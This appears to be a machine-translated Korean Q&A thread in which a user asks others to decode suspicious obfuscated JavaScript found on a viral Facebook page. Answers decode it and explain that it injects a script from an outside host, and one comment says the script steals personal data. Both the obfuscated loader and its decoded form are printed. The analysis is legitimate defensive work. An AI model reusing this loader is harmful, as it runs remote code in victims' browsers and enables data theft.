2011-04-22 1 views
3

Facebook의 바이러스 성 페이지 here에서이 자바 스크립트를 발견했습니다. 나는이 코드가 악의적이라고 생각하여 그것이 무엇을하는지 알고 싶다.누군가이 자바 스크립트를 디코딩 할 수 있습니까?

javascript: var _0xa064=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x64\x74\x67\x2D\x63\x73\x2E\x68\x6F\x73\x74\x6F\x69\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x65\x73\x6F\x72\x69\x63\x61\x2F\x66\x75\x72\x6B\x61\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xa064[2]](_0xa064[1]))[_0xa064[0]]=_0xa064[3];b[_0xa064[5]][_0xa064[4]](a); void (0); 

답변

7
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js'; 
b['body']['appendChild'](a); 
void(0); 
+3

그가 삽입 한 스크립트는 그가 훔쳐가는 개인 데이터를 알려주고 있습니다. – Raynos

+1

어떻게 그렇게 빨리 디코딩 했습니까? –

+0

unescape()은 내가 올 수있는 최선의 방법입니다 ... –

2

그것은

dtg-cs.hostoi.com/profesorica/furka.js 

내가 강하게 악성 뭔가 의심 것이다 가져 오는 스크립트 태그를 만듭니다 다음은 코드입니다.

편집 해당 스크립트가 다양한 아약스 요청 중 포함으로 —는 "성기-xd.jpg"나는 우리가 확실히 악성 :-)로 취급 할 수 있다고 생각라는 파일에 대한 참조

+1

그 스크립트는 상당 부분 세미의 누락되었습니다 –

+2

하하 네, 그렇습니다 - 우리는 그들의 bugtracker를 찾아서 그것을 기록해야합니다 :-) – Pointy

1

그것은 시도 로드하려면 : dtg-cs.hostoi.com/profesorica/furka.js